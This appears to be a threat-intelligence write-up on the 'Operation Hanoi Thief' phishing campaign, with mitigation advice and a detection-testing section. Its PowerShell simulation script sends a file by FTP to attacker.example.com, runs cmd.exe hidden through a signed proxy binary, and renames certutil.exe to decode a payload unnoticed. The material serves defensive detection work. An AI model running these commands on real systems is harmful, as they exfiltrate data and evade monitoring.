Operation Hanoi Thief: Threat Actor Hits Vietnamese IT and Hiring Teams

Summary

A spear-phishing operation dubbed “Operation Hanoi Thief” delivers a malicious ZIP archive that bundles a shortcut (LNK) and a pseudo-polyglot document. The shortcut abuses ftp.exe to execute a batch script that drops a DLL named MsCtfMonitor.dll into ProgramData and then performs DLL sideloading via ctfmon.exe. This DLL, dubbed LOTUSHARVEST, steals browser credentials and history and then exfiltrates the collected data over HTTPS.

Operation Hanoi Thief Campaign Analysis

SEQRITE Labs APT-Team researchers unpacked the ZIP archive, documented the LNK command line abusing ftp.exe, observed the creation of a renamed certutil.exe binary, and explored the DLL sideloading chain. They further captured network indicators involved in data exfiltration and attributed the campaign to a likely Chinese nation-backed threat actor.

Mitigation

Defensive guidance includes blocking execution of suspicious LNK shortcuts, limiting the use of native Windows tools like ftp.exe and certutil.exe in untrusted scripts, enforcing controls around DLL loading paths, and monitoring outbound HTTPS traffic to unfamiliar domains. Organizations should also apply strict email attachment filtering and reinforce user training around resume-themed phishing lures.

Response

Trigger alerts on the appearance of MsCtfMonitor.dll in ProgramData, ftp.exe executions with the -s flag, and outbound requests to known malicious domains. Quarantine any impacted files, isolate the compromised endpoint, and perform password and credential rotation for affected browsers.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

• Attack Narrative & Commands:
  An attacker who has gained a low‑privilege shell on a compromised Windows machine wishes to exfiltrate data and maintain stealth.

  1. Stage 1 – FTP script execution: The attacker creates a temporary script upload.txt containing FTP commands and runs ftp.exe -s upload.txt to transfer files to an external server.
  2. Stage 2 – Proxy command execution: To hide the use of cmd.exe, the attacker launches DeviceCredentialDeployment.exe with the argument cmd.exe /c whoami; the signed utility spawns a hidden command shell, evading simple process‑name alerts.
  3. Stage 3 – Masqueraded certutil usage: The attacker copies certutil.exe to C:\Temp\lala.exe and runs lala.exe -decode malicious.b64 output.exe to decode payloads, leveraging the rename to bypass filename‑based detections.

• Regression Test Script: The following PowerShell script reproduces the three steps in a repeatable way.

  # Regression Test Script – triggers the detection rule
  # 1. FTP with -s flag
  $ftpScript = "$env:TEMP\upload.txt"
  @"
  open attacker.example.com
  user testuser testpass
  put C:\Windows\System32\notepad.exe notepad.exe
  quit
  "@ | Set-Content -Path $ftpScript -Encoding ASCII
  Start-Process -FilePath "C:\Windows\System32\ftp.exe" -ArgumentList "-s `"$ftpScript`"" -NoNewWindow -Wait
  
  # 2. DeviceCredentialDeployment.exe proxying cmd.exe
  $dccPath = "C:\Program Files\DeviceCredentialDeployment\DeviceCredentialDeployment.exe"
  if (Test-Path $dccPath) {
      Start-Process -FilePath $dccPath -ArgumentList "cmd.exe /c whoami" -WindowStyle Hidden -Wait
  } else {
      Write-Host "DeviceCredentialDeployment.exe not found – skipping step 2."
  }
  
  # 3. Masqueraded certutil execution
  $original = "$env:SystemRoot\System32\certutil.exe"
  $masq = "$env:TEMP\lala.exe"
  Copy-Item -Path $original -Destination $masq -Force
  $payload = "$env:TEMP\malicious.b64"
  $output  = "$env:TEMP\decoded.exe"
  # Create a dummy base64 payload
  [IO.File]::WriteAllText($payload, [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("echo malicious")))
  Start-Process -FilePath $masq -ArgumentList "-decode `"$payload`" `"$output`"" -NoNewWindow -Wait

• Cleanup Commands: Remove artefacts created during the test.

  # Cleanup Script
  Remove-Item -Path "$env:TEMP\upload.txt" -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\malicious.b64" -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\decoded.exe" -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\lala.exe" -ErrorAction SilentlyContinue
  Write-Host "Cleanup completed."